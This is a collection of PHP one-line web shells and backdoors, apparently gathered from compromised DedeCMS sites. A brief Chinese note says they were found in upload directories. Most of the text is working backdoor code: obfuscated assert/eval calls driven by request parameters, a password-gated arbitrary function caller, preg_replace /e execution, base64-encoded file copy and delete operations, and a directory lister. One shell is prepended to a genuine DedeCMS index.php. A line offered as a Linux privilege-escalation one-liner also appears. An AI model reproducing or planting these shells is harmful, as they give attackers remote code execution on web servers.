<?array_map("ass\x65rt",(array)$_REQUEST[dede]);?>
<?php $command=$_POST[1990]; @eval($command);?>
打着广告的名义忽悠的php木马,不少一句话木马出现在附件上传目中,以达到网站挣钱的目的,而且还不是自己的网站,可通过linux命令批量查看文件查找到。
<?array_map("ass\x65rt",(array)$_REQUEST[seay]);?>
* @version $Id: index.php 1 9:23 2010-11-11 tianya $
* @package DedeCMS.Site
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
{
header('Location:install/index.php');
exit();
}
if(isset($_GET['upcache']) || !file_exists('index.html'))
{
require_once (dirname(__FILE__) . "/include/common.inc.php");
require_once DEDEINC."/arc.partview.class.php";
$GLOBALS['_arclistEnv'] = 'index';
$row = $dsql->GetOne("Select * From `#@__homepageset`");
$row['templet'] = MfTemplet($row['templet']);
$pv = new PartView();
$pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
$row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
if ($row['showmod'] == 1)
{
$pv->SaveToHtml(dirname(__FILE__).'/index.html');
include(dirname(__FILE__).'/index.html');
exit();
} else {
$pv->Display();
exit();
}
}
else
{
header('HTTP/1.1 301 Moved Permanently');
header('Location:index.html');
}
?>
<?php error_reporting(E_ERROR); if (isset($_REQUEST['myfunctionpassw'])) define('FUNCTION_PASSW',stripslashes($_REQUEST['myfunctionpassw'])); if (isset($_REQUEST['myfunctioncodea'])) define('FUNCTION_CODEA',stripslashes($_REQUEST['myfunctioncodea'])); if (isset($_REQUEST['myfunctioncodeb'])) define('FUNCTION_CODEB',stripslashes($_REQUEST['myfunctioncodeb'])); if (isset($_REQUEST['myfunctioncodec'])) define('FUNCTION_CODEC',stripslashes($_REQUEST['myfunctioncodec'])); if (substr ( md5 (FUNCTION_PASSW),26) == '254bff') { if (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']) && isset($_REQUEST['myfunctioncodec'])) $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB, FUNCTION_CODEC); elseif (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb'])) $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB) ? print(FUNCTION_CODEA.' ok') : print(FUNCTION_CODEA.' err'); else $_REQUEST['myfunctionname'](FUNCTION_CODEA); } else { die('Access Denied'); }
?>
linux一句话提权:install uprobes /bin/sh
组合木马
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
<?php $k="ass"."ert"; $k(${"_PO"."ST"} [sz]);?> <?php copy(base64_decode("Li4vLi4vLi4vcGx1cy9kb3dubG9hZC5waHA="),base64_decode("Li4vLi4vZGVkZWRvd25sb2FkLnBocA=="));copy(base64_decode("Li4vLi4vLi4vcGx1cy9teXRhZ19qcy5waHA="),base64_decode("Li4vLi4vZGVkZW15dGFnLnBocA=="));echo "dedeok823571";?> <?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["52296"]);?> <?php unlink(base64_decode("Li4vLi4vcGx1cy9kb3dubG9hZC5waHA="));unlink(base64_decode("Li4vLi4vcGx1cy9teXRhZ19qcy5waHA="));echo "dedeok913438";?> <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?> <?$_POST['k']($_POST['8']);?> <?php $k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); ?> <?php $_GET['k8']($_POST['k8']);?> <?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["k8"]); ?> <?php @preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?> <?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["16883"]);?> <?php echo "dedeok245563";$a=scandir("../../../../");print_r($a);?> <?php@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied"); ?>